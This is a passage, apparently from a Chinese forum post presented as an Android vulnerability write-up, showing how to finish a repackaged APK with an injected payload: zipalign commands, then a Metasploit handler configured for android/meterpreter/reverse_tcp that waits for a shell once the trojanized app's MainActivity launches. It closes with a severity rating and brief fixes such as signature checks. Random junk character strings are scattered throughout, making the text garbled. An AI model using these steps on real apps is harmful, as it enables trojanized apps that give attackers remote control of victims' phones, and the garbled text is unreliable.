+ W% l* L1 g Q' F3 R , z& C) F. {0 M 字节对齐优化 8 \7 |7 W0 E/ _( A" A; {9 `* C4 x& G. }8 J; B

9 |) [& P7 H5 ^- d5 J k5 p: e/ r0 B) ^( g& x- c$ C. J zipalign -v 4 repackaged.apk final.apk 6 Q" q5 s1 J9 _. V* ^ 9 o6 X& c! V% i k* h1 p i. @

6 F; {$ c1 z7 ~" F+ \7 w 0 g' Q2 g1 ?& u! `- [ 检查是否对齐 ( ? K+ c% T) [3 t1 m " K3 M9 x" F% S: C" d, a v

8 R1 r b2 Q* J4 L8 ~1 o { + r$ d; G$ q# T. E* }6 F zipalign -c -v 4 final.apk - _+ H5 B# A2 X6 y$ T9 J6 M' r2 x7 u+ N9 x# f

" N1 \& K5 b' u' N6 y D: A! Q R4 A0 D v! ~ 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 2 ]+ ^ f9 K# K4 Q' k t9 {; i7 ]6 i8 S

( @4 O3 d. K0 O0 x" V 3 h) g. q- U( C/ y- } 启动Metasploit控制台，配置参数等待上线 # x2 v& {' P$ t8 p: d: O 5 g! H5 t5 i0 B! r5 ]* R$ i

0 e7 p# L- |9 }- E! ^ 2 n6 E# l+ d$ r% W 在终端依次输入如下命令 2 m; l7 @, A- N# D) d. ^# d" W- H9 }! Y* G# w# a

8 I/ e& H! {$ \) [% R" u & A, W& i+ t5 w) P4 a2 ~' g msfconsole : _8 C! k: c' c) y: ~- \. ]) y+ D* j: C$ w* c. U

% P6 F) q4 O. y/ R, D 7 x3 N, Y5 p) d* k( A use exploit/multi/handler . i' F, R! | g1 k* x8 z- T0 Z( m7 W * M: I0 |0 O$ x# p/ c2 |

- A7 @, q7 Q' w7 A 4 Y: X( U' `, f% O; L: [) L4 V7 r set PAYLOAD android/meterpreter/reverse_tcp ) a! f) N5 b& o1 q, H" B; K% q; u

0 w8 @! `0 h9 X! j L , S/ [7 T7 \: r' ]: f( X4 y. Q6 | set LHOST 192.xxx.xx.xx - u. O6 s, K3 ^9 G; w 0 b6 S) a6 \! e

+ C* C3 a( U! p / ^& v- Q5 t, h- B! l/ [' t set LPORT 4444 : i5 C' B/ m! v" p2 X: I9 ? 5 M) A# } R+ u( [; z% G

# M- n; N7 P+ x5 q3 Q* m4 C% p $ a z5 X; a* G. b+ b$ t. b: F exploit ) S) O/ b8 h# c# Z( o 0 d) k) P' ]- z. y2 e

5 o% N, ?( D2 X , E- c( t1 m/ X% I% g( u. U 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： 8 h' j9 L5 g" Y8 B4 F3 B - F9 V5 Q2 Z ^- V$ t& J1 u

9 I2 U3 N, y {! n/ G B + I- F8 A: t: p- i( ] 漏洞危害：中 5 m) q6 T) N+ a, @/ Q) f' S- C9 e( o' ]( Y+ L+ j& `8 V' x

5 B. @2 C% C9 _1 s, U; A ( Q- y( K8 Q0 P8 h/ S/ j3 L B . Z% l0 Q o' F. A) d$ G" b: I) r& ^ 严重程度 9 ?, P. R; j" e' Y+ E; \|, {+ }: Q' C/ m" ^+ t$ c9 ^% V4 z6 y " `; H; G Y1 W# e8 q9 E/ } + }- B4 x! Y$ x3 F	4 {. ?7 f% Z$ B + W* i7 f% A2 ^1 h 7 B7 j2 a' Y! i+ S4 I O, J1 u1 j7 k/ J' A0 `: t5 ], p 高 ( ^# o( \|+ u4 Z4 P3 ~ v ; n% U& i. o5 L2 _1 B # f. W- y; l% K' z7 G/ c- C+ v 4 \| e! o! u: z	/ \4 v! h3 o3 i M @/ `, I% k2 m$ B 9 d* Q9 b1 ]5 l& M/ G' s1 l- f3 K: ~! I2 C9 j7 [3 l ■ & b% y/ E8 A3 c ) a- b7 L" ]% Z& P- R2 i ! X! {+ d& C0 M# S & j: I1 s' s: g	5 F: p- o0 R5 M' I9 p1 k% V7 i5 U+ O3 w ) @) S0 j* L' [! \6 ]. @" w5 h& l 5 d( q7 q8 W2 L) w' w; F $ h6 p s3 Y" D1 \/ {# f4 _ 中 * S* E- g0 s: {4 f$ h e ' W& @1 ]% H9 d `( Q " P8 x8 u O$ h) Q3 t) Q6 ` 2 `6 t/ r: X4 f( d8 c& P. B. C	0 Z- k$ c; N8 ?7 J- G% r4 A6 P3 [! A 7 C. E9 }% Q( i# U 0 l/ q8 p* O! n/ B& r 3 D( U! T$ Y. F! [ 1 X. `4 R! a2 ^& b1 U r i3 R! s4 V' D. }3 Y) [ 1 d3 S2 G$ u l , V" L1 O) u, M$ \|+ [, [) I% ~4 \. {! W8 h, z" F1 p! G& u, H	6 _9 k. ~4 E) i2 i . x' ?+ W3 t8 ?* s" O4 [5 w & h7 j$ N+ F; A/ V/ g' P ' F- K5 T/ I5 f5 R 低 3 p/ `1 \1 _+ A* y% s ! l7 l/ G j! `" n' W , T7 S4 Z1 `" @1 \|: w/ x( [, a 3 j! m. s4 D) U8 E0 d	2 U* j3 i# _# X: y3 n4 k& ? : t. j* ?$ _+ }& N ( q# m5 J" u- c4 \| ! \|2 G X# [6 z / O8 ^6 U4 L5 m4 L$ ^' \| & d1 h1 h6 N- b! e, Z [& p/ X2 s$ x( h4 \8 R! U+ W3 d3 u ) U9 l- k- \* y( i" W6 R! ^+ P6 R( h3 L

0 S# O& ~! H7 Y6 E) c - b: T4 l- A5 w9 M3 @ 9 p5 \1 z# u; n% ]3 f H : q _' A/ }1 Z# c$ q8 Q

! P# D l6 N c5 t1 m 9 @5 Z9 h6 u' s8 m 修复方法： ; p3 { o7 I" m+ a+ _* H( C g + W; K2 `6 N, J+ `

. J+ U, m- M$ W5 x( |+ P- G % _$ H4 i& k& H/ r6 D4 K" Q 1.在 APP 启动时应做签名校验防止二次打包。
$ Z, t+ x- E: t* P1 |7 G- ~9 A, X& |; E$ _, K \ 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 . _3 O! R" ]% ^# H& h% N" F; p L. c( T; Z2 O3 ?4 i6 n6 c

* B- ^2 P/ c% z! |! C; [6 T # F) T7 U- |" ]+ {! ] * d f% }8 }* s0 M % L2 ~7 S. }! K8 L+ M5 Y, g

) i+ c7 w+ T6 d3 ~! T8 Z- }' o# Q . w. m8 C3 X0 {+ U9 @7 Y% a
- ?% ~/ t# Z/ o8 t8 ]% V) W) ] ; b( T% H5 r6 V7 V; O

		自动登录	找回密码
密码			立即注册